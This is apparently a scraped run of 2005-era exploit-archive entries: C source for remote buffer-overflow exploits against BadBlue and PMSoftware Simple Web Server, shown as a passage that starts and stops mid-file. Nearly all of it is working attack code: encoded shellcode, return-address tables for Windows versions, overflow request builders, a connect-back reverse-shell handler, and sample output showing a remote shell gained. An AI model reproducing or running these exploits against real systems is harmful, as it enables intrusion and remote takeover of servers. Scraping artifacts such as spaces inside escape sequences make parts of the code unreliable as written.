printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP- - - \n");
printf(" [+] 2. WinXP SP2 Pro. English \n");
printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
printf(" [+] 2. WinXP SP- - - \n");
printf(" [+] 3. Win2k3 SP0 Server Italian (*)\n");
printf(" [+] 3. Win2k3 SP- - - \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working, else, supposed working.\n");
printf(" A symbol (-) mean all.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================== =[0.1]=====\n");
printf(" ================BadBlue, Easy File Sharing 2.5===============\n");
printf(" ================ext.dll, Remote Stack Overflow===============\n");
printf(" ======coded by class101==================[Hat-Squad.com]=====\n");
printf(" =====================================[class101.org 2005]=====\n");
printf(" \n");
}
// [2005-02-27]
80 BadBlue 2.55 Web Server Remote Buffer Overflow
/* Badblue 2.55 Web Server remote buffer overflow
* ( Version: BadBlue Personal Edition v2.55 Date: Dec. 9, 2004 )
*
* Tested under Windows 2000 Professional SP3/SP4 Spanish
* Windows 2000 Server SP4 Spanish
* Windows XP SP1 Spanish
*
* Credits:
* Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* http://lists.netsys.com/pipermail/full-disclosure/2005-February/032029.html
*
* Exploit by : Miguel Tarascó Acuña
* Tarako AT Haxorcitos.com
* Exploit Date: 26/12/2004
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr
*
************************************************** *************************
*
* D:\expl_badblue\Release>badblue.exe 192.168.1.82 80 1
*
* Badblue 2.55 Web Server - Remote buffer overflow
* Tarako AT Haxorcitos.com
*
* [i] Retrieving HTTP Server Header
* [i] Server : BadBlue/2.5
* [i] Connected : Yes
* [i] Target : Win2k Professional SP3/SP4 & Server SP4 (ext.dll)
* [i] Work : Complete
* [i] Now : telnet 192.168.1.82 9999
*
************************************************** *************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
#define TIMEOUT 1
#define VALIDSERVER "BadBlue/2.5"
#define GETHEADER "HEAD HTTP/1.1\r\n\r\n"
#define HTTPSEND1 "GET /ext.dll?mfcisapicommand="
#define HTTPSEND2 "&page=index.htx HTTP/1.1\n\
Accept: */*\n\
Accept-Language: es\n\
Accept-Encodin: gzip, deflate\n\
User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\
Host: "
#define HTTPSEND3 "\nConnection: Keep-Alive\r\n\r\n"
#define LEN 500
char shellcode[]=
"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33"
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C"
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE"
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB"
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77"
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77"
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77"
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77"
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77"
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77"
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77"
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77"
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77"
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB"
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C"
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0"
"\x8A\x88\xAF\x87\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77"
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0"
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB"
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5"
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98"
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE"
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77"
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8"
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90"
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74"
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4"
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94"
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5"
"\xD3\x4A\x8C\x88";
struct TARGETS {
int num;
char name[58];
char offset[5];
} targets[]= {
// char offset[]="\x56\x66\x46\x78"; // ntdll.dll V. 5.0.2195.6899 Windows 2k Spanish (CALL EBX)
// char offset[]="\x37\x25\x01\x10"; // ext.dll V. 1.0.0.1 (CALL EBX) Windows 2k SP4 Spanish
// char offset[]="\x3E\xFA\x02\x10"; // ext.dll V. 1.0.0.1 (FF55 0C CALL [EBP+C]) Windows XP SP1 Spanish
{ 0, "WinXP Professional SP1 (ext.dll)", "\x3E\xFA\x02\x10" }, // CALL [EBP+C]
{ 1, "Win2k Professional SP3/SP4 & Server SP4 (ext.dll)", "\x37\x25\x01\x10" }, // CALL EBX
//{ 2, "Crash", 0x41414141 }, // crash
};
char jmp[]="\xEB\x07"; // JMP $+9 (EB 07) To jump the offset
char jmpback[]="\xE9\x0D\xFE\xFF\xFF"; // JMP $-494 (E9 0DFEFFFF) To jump to the beginning of the shellcode
int CheckHeader(SOCKET s,struct sockaddr_in sa) { // Server: BadBlue/2.5
timeval tiempo;
fd_set fdset;
int leido; // Bytes leidos en el recv
char buffer[1024]; // Buffer de lectura con el recv
char version[11];
int retorno=0;
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0, 0))==INVALID_SOCKET){
printf("\n [e] Error: socket():%d\n", WSAGetLastError());
return(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("\n [e] Error: connect()");
return(1);
}
send(s,GETHEADER,strlen(GETHEADER),0);
tiempo.tv_sec=TIMEOUT; // TimeOut del Select
tiempo.tv_usec=0;
FD_ZERO( &fdset ); // Inicializa FDSet a NULL
FD_SET( s, &fdset ); // Añade el descriptor AcceptedSocket a FDSet
if ((select( s + 1 , &fdset , NULL , NULL , &tiempo )) >0) {
if (FD_ISSET(s,(fd_set FAR *)&fdset)) { // True si ConnectSocket esta en FDSet
memset(&buffer, 0, sizeof(buffer));
if ((leido=recv( s,buffer,sizeof(buffer),0 )) > 0) {
if (leido > 42) {
strncpy(version,buffer+32,strlen(VALIDSERVER));
printf("\n [i] Server : %s",version);
if (strncmp(version,VALIDSERVER,strlen(VALIDSERVER))! =0) retorno=1;
}
else retorno=1;
}
else {
printf("\n [e] Server : Unknown");
retorno=1;
}
}
}
closesocket(s);
return(retorno);
}
void main(int argc, char *argv[]) {
SOCKET s;
WSADATA HWSAdata;
struct sockaddr_in sa;
char *buffer=NULL;
UINT i;
printf("\n Badblue 2.55 Web Server - Remote buffer overflow");
printf("\n Tarako AT Haxorcitos.com\n");
if ( (argc!=4) || (atoi(argv[3])>=sizeof(targets) / sizeof(struct TARGETS))) {
printf("\n OS:",argv[0]);
for (i=0;i<(sizeof(targets) / sizeof(struct TARGETS));i++) {
printf("\n %i - %s",i,targets[i].name);
}
printf("\n\n Usage: %s <IP> <Port> <OS> \n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError());
exit(1);
}
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0, 0))==INVALID_SOCKET){
printf("\n [e] Error: socket():%d\n", WSAGetLastError());
exit(1);
}
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(atoi(argv[2]));
sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);
printf("\n [i] Retrieving HTTP Server Header");
if (CheckHeader(s,sa)==1) {
printf("\n [i] Aborting exploit\n\n");
exit(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("\n [e] Error: connect()");
exit(1);
}
printf("\n [i] Connected : Yes");
printf("\n [i] Target : %s ",targets[atoi(argv[3])].name);
buffer=(char*)malloc(sizeof(char)*(strlen(HTTPSEND 1)+strlen(HTTPSEND2)+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1));
memset(buffer,0,strlen(HTTPSEND1)+strlen(HTTPSEND2 )+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1);
memcpy(buffer,HTTPSEND1,strlen(HTTPSEND1));
for( i=strlen(HTTPSEND1);i<(LEN+strlen(HTTPSEND1));i++) buffer[i]=(BYTE)0x90;
memcpy(buffer+strlen(HTTPSEND1),shellcode,strlen(s hellcode));
memcpy(buffer+strlen(HTTPSEND1)+485,jmp,strlen(jmp ));
memcpy(buffer+strlen(HTTPSEND1)+489,targets[atoi(argv[3])].offset,strlen(targets[atoi(argv[3])].offset));
memcpy(buffer+strlen(HTTPSEND1)+494,jmpback,strlen (jmpback));
memcpy(buffer+strlen(HTTPSEND1)+LEN,HTTPSEND2,strl en(HTTPSEND2));
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEN D2),argv[1],strlen(argv[1]));
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEN D2)+strlen(argv[1]),HTTPSEND3,strlen(HTTPSEND3));
send(s,buffer,strlen(buffer),0);
closesocket(s);
printf("\n [i] Work : Complete");
printf("\n [i] Now : telnet %s 9999\n",argv[1]);
}
// [2005-02-27]
80 PMSoftware Simple Web Server (GET Request) Remote BoF Exploit
/*
*
* PMSoftware Simple Web Server Buffer Overflow Exploit
* 3 targets
*
* cybertronic[at]gmx[dot]net
* 04/25/2005
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* Usage: ./PMSoftwareSimpleWebServer_expl -h <tip> -p <tport> -l <cbip> -c <cbport> -t <target>
* 0 WinXP Home SP1 GER [0x71a17bfb] [pad=213] [offset=222]
* 1 WinXP Prof SP1 GER [0x71a17bfb] [pad=216] [offset=225]
* 2 WinXP Prof SP2 GER [0x71a19372] [pad=215] [offset=224]
*
* [ cybertronic @ PM ] $ ./PMSoftwareSimpleWebServer_expl -h 192.168.2.103 -p 80 -l 192.168.2.102 -c 1337 -t 1
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ connecting to 192.168.2.103:80...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x71a17bfb [ jmp esp in ws2_32.dll ]
* --[ sending GET request [ 543 bytes ]...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.103
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\PMSoftware>
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define PORT 80
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
* prototypes
*
*/
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ );
int shell ( int s, char* tip, unsigned short cbport );
void header ();
void start_reverse_handler ( unsigned short cbport );
void usage ( char* name );
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\x C6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x 91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x 99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x 1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x 99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x 12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\x C8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\x A9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x 89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\x BD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\x EF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x 66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x 4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x 96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x 86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x 9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x 17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x 52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
/*
*
* structures
*
*/
typedef struct _args {
char* tip;
char* lip;
int tport;
int lport;
int target;
} args;
struct targets {
int num;
char name[64];
unsigned long ret;
int padding;
int offset;
}
target[]= {
{ 0, "WinXP Home SP1 GER", 0x71a17bfb, 213, 222 },
{ 1, "WinXP Prof SP1 GER", 0x71a17bfb, 216, 225 },
{ 2, "WinXP Prof SP2 GER", 0x71a19372, 215, 224 } //works only in conjunction with SoftIce :: stack guard is disabled somehow
};
/*
*
* functions
*
*/
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
struct sockaddr_in remote_addr;
struct hostent *host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
return ( s );
}
int
exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ )
{
char in[2048], request[1024];
printf ( "--[ exploiting WinXP Pro SP1 GER\n" );
printf ( "--[ ret: 0x%08x [ jmp esp in ws2_32.dll ]\n", target[targ].ret );
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
bzero ( &request, sizeof ( request ) );
request[0] = 0x47;
request[1] = 0x45;
request[2] = 0x54;
request[3] = 0x20;
request[4] = 0x2f;
memset ( request + 5, 0x41, target[targ].padding );
strncat ( request, ( unsigned char* ) &target[targ].ret, 4 );
memcpy ( request + target[targ].offset, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( request, "\r\n" );
printf ( "--[ sending GET request [ %d bytes ]...", strlen ( request ) );
if ( write ( s, request, strlen ( request ) ) <= 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
return ( 0 );
}
int
send_head ( int s )
{
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "h:p:l:c:t:" ) ) != -1 )
{
switch ( i )
{
case 'h':
argp->tip = optarg;
break;
case 'p':
argp->tport = atoi ( optarg );
break;
case 'l':
argp->lip = optarg;
break;
case 'c':
argp->lport = atoi ( optarg );
break;
case 't':
argp->target = strtoul ( optarg, NULL, 16 );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 || argp->target < 0 || argp->target > 2 )
usage ( argv[0] );
}
void
start_reverse_handler ( unsigned short cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
void
usage ( char* name )
{
int i;
printf ( "Usage: %s -h <tip> -p <tport> -l <cbip> -c <lport> -t <target>\n", name );
for ( i = 0; i < 3; i++ )
printf ( "\t%d %s [0x%08x] [pad=%d] [offset=%d]\n", target[i].num, target[i].name, target[i].ret, target[i].padding, target[i].offset );
exit ( 1 );
}
int
main ( int argc, char* argv[] )
{
int s, targ, i;
unsigned long xoredip;
unsigned short cbport, xoredcbport;
struct sockaddr_in remote_addr;
struct hostent *host_addr;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
xoredip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit ( s, xoredip, xoredcbport, myargs.target ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
}
// [2005-04-24]
80 PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit
/*
PMsoftware mini http server remote stack overflow exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
package : PMsoftware Web Server version 1.0
advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
company address : www.pmx.it
timeline :
17 Feb 2005 : bug found by ERNW Security
18 Apr 2005 : Public Disclosure
18 Apr 2005 : crash exploit released (ERNW Security)
20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
compiled with visual c++ 6 : cl pm.c
greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
ihsteam.com (persian) www.ihssecurity.com (english , just started)
a big F*u to those who were/are/will trading konkoor questions-answers
(c) IHS security 2005
/*
/*
D:\projects>pm.exe 127.0.0.1 80 0
-------- PMSoftware web server remote overflow exploit by c0d3r
[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444
D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\PMSoftware>DONE !
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680
// 5 byte GET + 241 byte NOP junk + 4 byte containing return address
// + 30 byte NOP + 399 byte shellcode
// using metasploit great shellcode LPORT=4444 Size=399
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x 85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x 84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x 84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x 42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x 89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\x da\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x 89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x 53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x 85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\x cc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x 68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x 52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x 7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\x b5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\x b4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\x d0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\x c6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\x dc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\x a1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x 08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x 7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\x f0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x 7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x 7a\xff\x98";
unsigned int rc,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char GET[] = "\x47\x45\x54\x20\x2F";
char winxpsp1[] = "\xCC\x59\xFB\x77";
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
int main (int argc, char *argv[]){
if(argc < 3) {
printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n");
printf("-------- usage : pm.exe host port target\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 1 : 1\n");
printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");
exit(-1) ;
}
printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");
exit(-1);
}
// Creating heart of exploit code
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer,GET,sizeof(GET)-1);
memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit code
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
